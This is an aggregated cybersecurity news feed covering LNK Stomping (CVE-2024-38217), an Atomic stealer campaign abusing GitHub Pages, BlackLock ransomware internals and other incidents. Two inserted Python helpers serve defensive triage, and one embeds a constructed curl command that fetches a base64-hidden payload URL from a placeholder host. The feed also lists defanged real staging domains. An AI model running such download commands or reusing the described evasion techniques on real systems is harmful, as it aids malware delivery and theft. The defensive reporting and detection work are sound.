• Montréal, Quebec, September 18, 2025 – In an unprecedented operation, the Royal Canadian Mounted Police (RCMP) Federal Policing – Eastern Region has executed the largest cryptocurrency seizure in Canadian history, recovering over 56 million dollars from the now-defunct TradeOgre exchange platform. This marks the first time Canadian law enforcement has dismantled an entire cryptocurrency trading […]

    The post Canada Police Shuts Down TradeOgre After $56M Crypto Theft appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A sophisticated attack technique called LNK Stomping has emerged as a critical threat to Windows security, exploiting a fundamental flaw in how the operating system handles shortcut files to bypass security controls. 

    Designated as CVE-2024-38217 and patched on September 10, 2024, this vulnerability demonstrates how attackers can manipulate Windows shortcuts (LNK files) to circumvent the Mark of the Web (MoTW) security feature, potentially allowing malicious code execution without triggering security warnings.

    The attack technique exploits Windows Explorer’s path normalization process, causing the system to inadvertently remove MoTW metadata from malicious files. 

    This bypass enables attackers to execute payloads while evading detection from Smart App Control (SAC) and SmartScreen, two critical Windows security components designed to protect users from untrusted downloads.

    LNK Stomping Exploitation

    ASEC reports that LNK Stomping leverages the complex binary structure of Windows shortcut files, particularly targeting the LinkTarget IDList component. 

    This section contains Shell Item IDs that specify the hierarchical location of target files within the Windows Shell namespace. 

    Attackers manipulate this structure by creating non-standard path configurations that trigger explorer.exe to perform canonicalization operations.

The attack follows a specific sequence: when a user clicks a maliciously crafted LNK file containing abnormal path structures, Windows Explorer detects the non-standard configuration and attempts to normalize it.

    During this process, the system overwrites the original LNK file while inadvertently removing the NTFS Alternate Data Stream (ADS) called Zone.Identifier, which contains the MoTW metadata. 

    This removal occurs before security checks are performed, allowing the malicious payload to execute without triggering defensive mechanisms.

Three primary manipulation techniques have been identified: PathSegment type attacks place an entire file path within a single IDList array element rather than splitting it into properly segmented components; Dot type attacks append periods or spaces to the execution target path; and Relative type attacks use only a filename without a complete path specification. All three create structural inconsistencies that trigger the normalization vulnerability.
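As an added defender-side example (not code from the ASEC or Elastic write-ups), the following Python script parses the LinkTargetIDList of a shortcut file according to the MS-SHLLINK header layout and flags the three structural anomalies described above. Shell item contents are treated as opaque bytes with printable runs extracted heuristically, so hits are triage leads rather than verdicts; the `build_fixture` samples are constructed test inputs with a dummy two-byte item prefix, not real shell items.

```python
import re
import struct

HEADER_SIZE = 0x4C                      # ShellLinkHeader size (MS-SHLLINK)
HAS_LINK_TARGET_IDLIST = 0x1            # LinkFlags bit 0
DRIVE_ROOT = re.compile(rb"[A-Za-z]:\\")
INNER_SEP = re.compile(rb"[^\\]\\[^\\]")  # backslash with path text on both sides

def parse_idlist(lnk: bytes) -> list[bytes]:
    """Return the raw Shell Item IDs of the LinkTargetIDList ([] if the flag is unset)."""
    if len(lnk) < HEADER_SIZE or struct.unpack_from("<I", lnk, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link header")
    if not struct.unpack_from("<I", lnk, 0x14)[0] & HAS_LINK_TARGET_IDLIST:
        return []
    size = struct.unpack_from("<H", lnk, HEADER_SIZE)[0]
    pos, end, items = HEADER_SIZE + 2, HEADER_SIZE + 2 + size, []
    while pos + 2 <= end:
        item_size = struct.unpack_from("<H", lnk, pos)[0]
        if item_size < 2:                   # TerminalID (0x0000) closes the list
            break
        items.append(lnk[pos + 2:pos + item_size])
        pos += item_size
    return items

def printable_runs(item: bytes) -> list[bytes]:
    return re.findall(rb"[\x20-\x7e]{3,}", item)

def stomping_indicators(lnk: bytes) -> list[str]:
    """Flag the three IDList anomalies the article lists; heuristic, expect some noise."""
    items = parse_idlist(lnk)
    texts = [s for it in items for s in printable_runs(it)]
    flags = []
    if any(INNER_SEP.search(s) for s in texts):
        flags.append("PathSegment")         # whole path crammed into one item
    if items and any(s.endswith((b".", b" ")) for s in printable_runs(items[-1])):
        flags.append("Dot")                 # trailing dot/space on the target name
    if texts and not any(DRIVE_ROOT.search(s) for s in texts):
        flags.append("Relative")            # bare filename, no volume/root item
    return flags

def build_fixture(items: list[bytes]) -> bytes:
    """Constructed minimal LNK (header + IDList only) for exercising the checks above."""
    header = struct.pack("<I", HEADER_SIZE) + bytes(16) + struct.pack("<I", HAS_LINK_TARGET_IDLIST)
    body = b"".join(struct.pack("<H", len(it) + 2) + it for it in items) + b"\x00\x00"
    return header.ljust(HEADER_SIZE, b"\x00") + struct.pack("<H", len(body)) + body

NORMAL = build_fixture([b"\x01\x00C:\\", b"\x01\x00app.exe"])  # constructed; dummy type prefix
PATHSEG = build_fixture([b"\x01\x00C:\\Windows\\System32\\app.exe"])
DOT = build_fixture([b"\x01\x00C:\\", b"\x01\x00app.exe."])
RELATIVE = build_fixture([b"\x01\x00app.exe"])
```

Real shortcuts carry typed shell items and further optional structures after the IDList, so a production check should pair this with a full parser and with a Zone.Identifier check on the file itself.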

Executing an LNK file using the LNK Stomping attack technique

    Security researchers at Elastic Security Labs identified numerous LNK Stomping samples on VirusTotal, with the oldest submissions dating back six years, indicating this technique has been exploited in the wild long before its formal disclosure. 

    The technique’s effectiveness stems from its ability to appear as legitimate system behavior. When LNK files execute, they invoke trusted Windows utilities, making malicious activities blend seamlessly with normal system operations. 

    CISA added CVE-2024-38217 to its Known Exploited Vulnerabilities (KEV) catalog, confirming active exploitation by threat actors.

    This approach has become increasingly popular following Microsoft’s macro blocking policies implemented in 2022, forcing attackers to seek alternative initial access vectors through file formats like ISO, RAR, and LNK files distributed via email attachments or compressed archives.

    Organizations face significant detection challenges because the attack exploits fundamental Windows file handling mechanisms rather than external vulnerabilities. 

    Traditional signature-based detection methods may fail to identify these attacks since they leverage legitimate system processes and file structures. 

    The persistence of this vulnerability for years before discovery highlights the importance of format-level security research and behavior-based analysis to identify previously unknown evasion techniques in familiar file types.


    The post Hackers Bypassing Windows Mark of the Web Files Using LNK Stomping Attack appeared first on Cyber Security News.


  • The Federal Bureau of Investigation has issued a critical public service announcement warning citizens about cybercriminals creating sophisticated spoofed versions of the FBI’s Internet Crime Complaint Center (IC3) website to harvest sensitive personal information from unsuspecting visitors. According to FBI Alert I-091925-PSA released on September 19, 2025, threat actors have been actively creating fraudulent websites […]

    The post Threat Actors Fake FBI IC3 Portal to Steal Visitor Information appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Industrial control systems (ICS) continue to face increasing cybersecurity challenges as threat actors employ sophisticated malicious scripts and phishing campaigns to target critical infrastructure. According to new data from Q2 2025, while overall attack rates have shown a marginal decline, specific threat vectors including email-based attacks and malicious documents are intensifying their assault on industrial […]

    The post Cybercriminals Exploit ICS Computers via Scripts and Phishing Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


• A sophisticated cyber-attack campaign is exploiting GitHub Pages to distribute the notorious Atomic stealer malware to macOS users.

    The threat actors behind this operation are leveraging Search Engine Optimization (SEO) techniques to position malicious repositories at the top of search results across major platforms, including Google and Bing, targeting users searching for legitimate software from technology companies, financial institutions, and password management services.

    The campaign demonstrates a multi-layered approach where cybercriminals create fraudulent GitHub repositories that masquerade as official software distributors. 

    When victims search for specific applications, the poisoned search results redirect them to malicious GitHub Pages hosting what appears to be legitimate software installers. 

    The LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team identified this threat after discovering two fraudulent repositories specifically targeting their customers, both created by the user “modhopmduck476” on September 16, 2025.

    Atomic Stealer Campaign Targets macOS Users

    The attack chain begins with victims encountering malicious GitHub Pages through SEO-poisoned search results.

    SEO-driven Referral to Malicious Software

    These repositories contain deceptive “Install [Company] on MacBook” links that redirect users to secondary staging sites. 

LastPass Impersonation Page

    In the LastPass case, victims were redirected to hxxps://ahoastock825[.]github[.]io/.github/lastpass, which subsequently forwarded them to macprograms-pro[.]com/mac-git-2-download.html.

The secondary site instructs users to execute a terminal command that performs a curl request to a base64-encoded URL.

Secondary site

    This encoded URL resolves to bonoud[.]com/get3/install.sh, which downloads the malicious payload disguised as a system “Update” to the temporary directory. 

    The downloaded file is actually the Atomic stealer malware, also known as AMOS malware, which has been active in cybercriminal circles since April 2023.
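As an added triage helper (not part of the LastPass report), this Python function decodes base64 tokens found in a shell one-liner of the kind described above and returns any that turn out to be URLs, so the staging host can be extracted and blocked without running the command. The sample command and the `malicious.example` host are constructed placeholders, not the campaign's real values.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Base64 tokens long enough to hold a URL; shorter runs are almost always flags or words
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
DECODE_PIPE = re.compile(r"base64\s+(-d|-D|--decode)")

def hidden_urls(command: str) -> list[str]:
    """Decode base64 tokens in a one-liner that pipes through base64 -d; return URLs."""
    if not DECODE_PIPE.search(command):
        return []
    found = []
    for tok in B64_TOKEN.findall(command):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue                        # not valid base64, or not text
        if text.startswith(("http://", "https://")):
            found.append(text)
    return found

def hidden_hosts(command: str) -> list[str]:
    """Hostnames of the decoded URLs, ready for blocklists or log correlation."""
    return [urlparse(u).hostname for u in hidden_urls(command)]

# Constructed sample in the shape the article describes (placeholder host, not the real one)
STAGE_URL = "https://malicious.example/get3/install.sh"
ENCODED = base64.b64encode(STAGE_URL.encode()).decode()
SAMPLE_CMD = f'curl -fsSL "$(echo {ENCODED} | base64 -d)" -o /tmp/Update'
```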

    Atomic Stealer represents a sophisticated information-stealing threat specifically designed for macOS environments. 

    The malware is capable of harvesting sensitive data, including passwords, browser cookies, cryptocurrency wallet information, and system credentials. 

    Once installed, it establishes persistence on the infected system and communicates with command-and-control (C2) servers to exfiltrate stolen data.

    The threat actors have demonstrated operational resilience by creating multiple GitHub usernames to circumvent takedown efforts. 

    This distributed approach allows them to maintain their malicious infrastructure even when individual repositories are reported and removed. 

The campaign’s scope extends beyond LastPass, with security researchers identifying similar attacks targeting various technology companies and financial institutions through identical tactics, techniques, and procedures (TTPs).

    LastPass has successfully coordinated the takedown of the identified malicious repositories and continues monitoring for additional threats. 

    The company advises macOS users to exercise caution when downloading software through search results and to always verify the authenticity of repositories before executing terminal commands or installing applications from unofficial sources.


    The post Massive Cyber-Attack Attacking macOS Users via GitHub Pages to Deliver Stealer Malware appeared first on Cyber Security News.


  • A sophisticated attack technique called LNK Stomping is enabling cybercriminals to bypass Windows security protections designed to block malicious files downloaded from the internet. The technique exploits a vulnerability in Windows shortcuts that was patched in September 2024 as CVE-2024-38217. Windows shortcuts, known as LNK files, have become increasingly popular attack vectors since Microsoft strengthened macro blocking […]

    The post Attackers Bypass Windows “Mark of the Web” Protections Using LNK-Stomping appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A sophisticated new ransomware operation dubbed BlackLock has emerged as a significant threat to organizations worldwide, demonstrating advanced cross-platform capabilities and targeting diverse computing environments. 

    Originally operating under the name “El Dorado” since March 2024, the group rebranded to BlackLock in September 2024, establishing itself as a formidable player in the ransomware landscape with victims spanning multiple countries and industries.

BlackLock’s technical sophistication lies in its development in the Go programming language, enabling the malware to execute seamlessly across Windows, Linux, and VMware ESXi systems.

    This cross-platform approach significantly expands the attack surface, allowing threat actors to compromise entire IT infrastructures simultaneously. 

    The ransomware operates under a Ransomware-as-a-Service (RaaS) model, actively recruiting skilled affiliates through Russian-speaking cybercrime forums, particularly RAMP.

BlackLock DLS

    Advanced Encryption and Cross-Platform Capabilities

    ASEC reports that the ransomware implements robust cryptographic techniques, utilizing Go’s crypto package to perform file encryption through ChaCha20.NewUnauthenticatedCipher() with randomly generated 32-byte FileKeys and 24-byte nonces for each targeted file. 

    This approach ensures that every encrypted file receives a unique encryption key, making recovery virtually impossible without the attackers’ decryption tools.

    BlackLock’s sophisticated key management system employs Elliptic Curve Diffie-Hellman (ECDH) key exchange to generate shared keys for metadata encryption. 

    The ransomware appends encrypted metadata containing the FileKey and victim information to each file, protected by secretbox.Seal() encryption. 

    This dual-layer encryption strategy prevents victims from independently recovering their data while ensuring the attackers can decrypt files upon ransom payment.

    The malware supports extensive command-line arguments for operational flexibility, including -path for targeted encryption, -delay for timed execution, -threads for performance optimization, and -perc for partial file encryption to accelerate the attack process. 

    Notably, the ransomware includes provisions for VMware ESXi environments through the -esxi option, though this feature remains unimplemented in the analyzed samples.

    BlackLock demonstrates advanced network propagation capabilities by utilizing open-source projects like go-smb2 to scan and access SMB shared folders across Windows networks. 

    The ransomware can authenticate using plaintext passwords or NTLM hashes specified through the -u, -p, and -h parameters, enabling lateral movement across corporate networks and simultaneous encryption of networked storage systems.

    To eliminate recovery options, BlackLock employs sophisticated data destruction techniques targeting Volume Shadow Copy Service (VSS) and Recycle Bin contents. 

    Rather than executing obvious command-line instructions, the malware constructs COM object instances to execute WMI queries through shellcode loaded directly into memory, making detection significantly more challenging for security solutions.

Ransom note

    The ransomware creates ransom notes titled HOW_RETURN_YOUR_DATA.TXT in every encrypted directory, containing threatening language that warns victims of business disruption and data leakage to customers and the public if ransom demands are not met. 

    This psychological pressure tactic, combined with the technical impossibility of independent data recovery, creates substantial leverage for the attackers.

    Organizations must implement comprehensive security strategies encompassing endpoint protection, network segmentation, and robust backup solutions to defend against this evolving threat landscape.


    The post BlackLock Ransomware Attacking Windows, Linux, and VMware ESXi Environments appeared first on Cyber Security News.


  • A critical token validation failure in Microsoft Entra ID (previously Azure Active Directory) could have allowed attackers to impersonate any user, including Global Administrators, across any tenant. The vulnerability, tracked as CVE-2025-55241, has been assigned the maximum CVSS score of 10.0. It has been described by Microsoft as a privilege escalation flaw in Azure Entra. There is no


  • Cybersecurity researchers have identified a concerning development in the underground cybercrime marketplace: a sophisticated Remote Access Trojan (RAT) being marketed as a fully undetectable (FUD) alternative to the legitimate ScreenConnect remote access solution. This emerging threat represents a significant escalation in the professionalization of malware-as-a-service operations, with threat actors specifically targeting the trust associated with […]

    The post Threat Actors Market Stealthy New RAT as Alternative to ScreenConnect FUD appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A sophisticated malware campaign is targeting Mac users through fraudulent GitHub repositories that masquerade as legitimate software downloads, with threat actors exploiting search engine optimization tactics to deliver malicious links directly to unsuspecting victims. The LastPass Threat Intelligence, Mitigation, and Escalation team has identified an ongoing widespread infostealer operation that specifically targets macOS users through […]

    The post Hackers Abuse GitHub Pages to Spread Stealer Malware to macOS Users appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
